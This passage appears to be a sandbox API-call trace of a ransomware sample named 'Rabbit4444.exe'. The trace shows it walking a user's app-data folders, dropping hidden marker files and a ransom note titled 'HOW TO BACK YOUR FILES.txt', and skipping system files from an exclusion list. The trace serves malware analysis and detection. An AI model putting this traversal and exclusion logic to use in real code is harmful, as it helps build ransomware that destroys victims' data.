lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache" [0061.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1182e8 | out: hHeap=0xe0000) returned 1 [0061.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0061.388] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache" [0061.388] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\" [0061.388] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0061.388] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.390] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.393] FlushFileBuffers (hFile=0x27c) returned 1 [0061.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.394] CloseHandle (hObject=0x27c) returned 1 [0061.395] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache") returned 83 [0061.395] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.395] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fd388, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.395] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.395] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.395] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.395] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fd388, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xede93d83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.395] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.395] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.395] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.395] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.395] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.395] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede93d83, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede93d83, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.395] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.395] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.395] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede93d83, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede93d83, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.395] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.395] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.395] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.396] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.396] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.396] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.396] CloseHandle (hObject=0x2a0) returned 1 [0061.396] CloseHandle (hObject=0x27c) returned 1 [0061.396] GetCurrentThreadId () returned 0xd98 [0061.396] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0061.396] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData" [0061.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117e18 | out: hHeap=0xe0000) returned 1 [0061.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0061.396] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData" [0061.396] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\" [0061.396] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0061.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.398] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.401] FlushFileBuffers (hFile=0x27c) returned 1 [0061.401] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.402] CloseHandle (hObject=0x27c) returned 1 [0061.402] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData") returned 80 [0061.402] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.402] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fcf6d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.402] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.402] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.402] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.402] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.402] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fcf6d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.403] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.403] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.403] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.403] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.403] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.403] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedeba031, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedeba031, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.403] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.403] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.403] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedeba031, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedeba031, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.403] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.403] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.403] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.403] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.404] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.404] CloseHandle (hObject=0x2a0) returned 1 [0061.404] CloseHandle (hObject=0x27c) returned 1 [0061.404] GetCurrentThreadId () returned 0xd98 [0061.404] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0061.404] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC" [0061.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113eb8 | out: hHeap=0xe0000) returned 1 [0061.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0061.404] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC" [0061.404] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\" [0061.404] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0061.404] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.407] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.410] FlushFileBuffers (hFile=0x27c) returned 1 [0061.411] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.411] CloseHandle (hObject=0x27c) returned 1 [0061.411] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC") returned 75 [0061.412] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.412] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfac4f463, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a02b33d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0061.412] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.412] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.412] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.412] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.412] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfac4f463, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a02b33d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xedeba031, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.412] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.412] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.412] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.412] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.412] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.412] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedeba031, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedeba031, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedee0234, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.412] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.412] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.412] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24faca3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac756bf, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0061.412] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0061.412] lstrcpyW (in: lpString1=0x130ebd0, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0061.412] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0061.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0061.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123eb8 [0061.413] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122348 [0061.413] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fb785, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac756bf, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0061.413] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0061.413] lstrcpyW (in: lpString1=0x130ebd0, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0061.413] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0061.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0061.414] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123bd8 [0061.414] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122248 [0061.414] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc080, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac756bf, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", 